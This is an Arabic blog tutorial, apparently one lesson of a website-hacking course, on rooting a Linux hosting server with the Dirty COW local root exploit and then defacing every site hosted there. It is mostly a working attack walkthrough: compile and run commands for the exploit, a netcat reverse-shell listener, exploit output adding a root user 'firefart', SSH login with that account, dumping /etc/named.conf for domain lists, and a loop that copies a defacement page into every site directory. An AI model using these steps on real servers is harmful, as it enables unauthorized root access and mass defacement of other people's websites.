16922060824144624
recent
أخبار ساخنة

شرح اختراق جميع المواقع التي على السيرفر عبر لوكال روت local root

الخط
السلام عليكم  و دائما في دورة اختراق المواقع اليوم معنا اهم شرح في الدورة و هو ترويت السيرفرات و اختراق جميع المواقع التي على السيرفر  و بعد ما شفنا طريقة اختراق جميع المواقع التي على سيرفر وندوز اليوم سوف نتعرف على طريقة اختراق جميع المواقع التي على السيرفر لينكس  طبعا فرق كبير جدا بين سيرفرات الوندوز و سيرفرات اللينكس ف سيرفرات لينكس صعبة جدا في اختراقها و الحصول على صلحيات ال root  للحصول على لوكال مناسب للسيرفر الدي تريد اختراقه سوف اقدم لكم احد الادوات الرائعة و التي تبحث لك على اللوكال المناسب للسيرفر بدون اي تدخل منك  و هادا شرح لها  و بعد ان تجد لوكال مناسب للسيرفر  دائما ما يكون اللوكل ب سيغة c مثال  local.c 
في بعض اللوكلات تجد طريقة ترجمة اللوكال و ادا لم تجده ف كل ما عليك فعله هو ان تقوم ب هده الترجمة  
gcc local.c -o local 
في بعض السيرفات و التي لا تكون لك فيها صلحيات لا يمكنك ان تقوم ب ترجمة الثغرة في السيرفر 
لهادا قم ب ترجمة الثغرة على جهازك 
و بعد ترجمة الثغرة نقوم ب اعطائها الصلاحيات عبر chmod 
chmod +x local  
و بعدها القيام ب عمل تشغيل ل الوكال عبر 
./local 
  في بعض المرات قد يتطلب ان تنتضر نصف ساعة كاملة لاكتمال 
و ادا كان لديك سيرفر من 2016 او تحته فهادا سهل جدا كل ما عليك القيام به هو تحميل هده الثغرة 
بعد تحميلك للثغرة قم ب حفضها ب اسم dirty.c و قم برفعها على السيرفر او قم ب ترجمتها على جهازك  و بعدها قم برفعها و الان قم ب عمل اتصال عكسي على السيرفر 
في بعض الاحيان لن تستطيع الاتصال ب السيرفر من الشل بل تحتاج الى سكربت البيرل او باش و ساشرح هده الطريقة في القريب العاجل المهم نكمل الشرح
قم بعمل اتصال عكسي عبر هادا الامر 
nc -lvp 21
قم ب تغيير البورت 21 الى اي بورت تريده
و كما نرى في الصورة فانه قد تم الاتصال ب السيرفر ب مجاح و الان سوف ندخل الى مجلد الدي يوجد به اللوكال روت 
بعد الاتصال ب السيرفر   قم ب ترجمة الثغرة  عبر هادا الامر 
gcc -pthread dirty.c -o dirty -lcrypt
 و الان سوف نقوم ب اعطائها التصريح عبر امر 
chmod +x dirty 
و كما نرى في الصورة فيانه قد تم ترجمة الثغرة و اعطائها التصاريح و لم يبقى لنا سوى ان نقوم نقوم ب تشغيل الوكال روت 
لتشغيل الثغرة 
./dirty
في حالة ما ضهر لك هادا الخطء الدي في هده الصورة   و معه هده الرسالة 
File /tmp/passwd.bak already exists! Please delete it and run again
فهادا يعني انه قد تم تجربة الثغرة على هادا السيرفر هل هادا يعني لا يمكننا ان نقوم ب ترويته !!! 
لالا سوف نقوم ب حدف ملف /tmp/passwd.bak  عبر هادا الامر 
rm /tmp/passwd.bak
و قم ب اعدة تشغيل الثغرة 
و الان سوف يضهر لك ان تدخل كلمة سر  سوف نختار على سبيل المثال  123456123
و سوف تستغرق هده العملية بعض الوقت من 10 دقائق الى 20 دقيقة 
و كما نرى في الصورة ف انه قد انتهى 
و كما نرى في الرسالة 
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fiT.MfhrH0uoo:0:0:pwned:/root:/bin/bash
mmap: 7fa12ebf1000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 و الان لنعرف انه قد تم اضافة root في السيرفر نقوم ب عرض ملف /etc/passwd عبر هادا الامر 
cat /etc/passwd
كما نرى في الصورة فانه تم اضافة root ب اسم firefart
و الان للدخول الى الروت هناك  ان استطعت نقل ملف /tmp/passwd.bak الى etc/passwd عبر الامر 
mv /tmp/passwd.bak /etc/passwd
 الان  تقوم ب الدخول من الترمنال عبر امر 
su firefart
و هده في الكثير من الاحيان لن تنجح معك كما نرى في الصورة 
و الان سوف نقوم ب التسجيل في ال ssh 
قم ب فتح الترمنال و كتابة هادا الامر 
ssh firefart@127.0.0.1
مع تغيير 127.0.0.1 الى ايبي السيرفر  
كما نرى في الصورة 
و كما نرى ف انه قد تم الاتصال ب ال ssh بكل نجاح طبعا كلمة السر هي 123456123 و الان لنعرف صلحياتنا على السيرفر نقوم ب اعطئه امر id 
و كما نرى في الصورة ف ان صلاحياتنا على السييرفر هي روت و يمكننا ان نقوم ب اي شيء في السيرفر حتى اطفائه و لكن شرحنا اليوم هو اختراق جميع مواقع السيرفر 
في البداية يجب ان نقوم ب ر فع اندكس الاختراق في السيرفر او رفعه في اي موقع و تنزيله عبر امر wget انا سوف ارفع الاندكس من الشل 
و كما نرى ف ان اسم الاندكس هو sa.html 
و المسار هو 
 /home/adoc11/public_html/__/ 
سوف نقوم ب الدخول الى مسار الاندكس عبر امر 
cd  /home/adoc11/public_html/__/ 
من ثم نقل الاندكس الى ملف ال home عبر هادا الامر 
mv index.html /home/
و كما هو موضح في الصورة 
 الدهاب الى ملف ال home و هادا عبر الامر 
cd /home/
و الان سوف نقوم ب سحب ملف ال named.conf و الدي توجد به جميع الدومينات 
امر السحب 
cat /etc/named.conf > dns.txt
 و الان قد تم سحب جميع اسماء النطاقات و وضعها في ملف  اسمه dns.txt و الان سوف نقوم ب الدهب الى هادا الموقع ل استخراج جميع الدومينات 
رابط الموقع اضغط هنا   وبعد ان قمنا ب استخراج جميع الدومينات لم يبقى لنا الى نقل الاندكس الى جميع المواقع التي على السيرفر ب هادا الامر 
for i in $(find . -type d -maxdepth 2); do cp -n sa.html $i/sa.html ; done
مع تغيير sa.html الى اسم الاندكس الخاص بك 
و كما نرى في الصورة قد تم تغغير جميع اندكسات المواقع 
و الان لمشاهدة الشرح ب الفيديو 
ليست هناك تعليقات
إرسال تعليق

إرسال تعليق

نموذج الاتصال
الاسمبريد إلكترونيرسالة

يا رب تروح للجنة إشترك في قناتي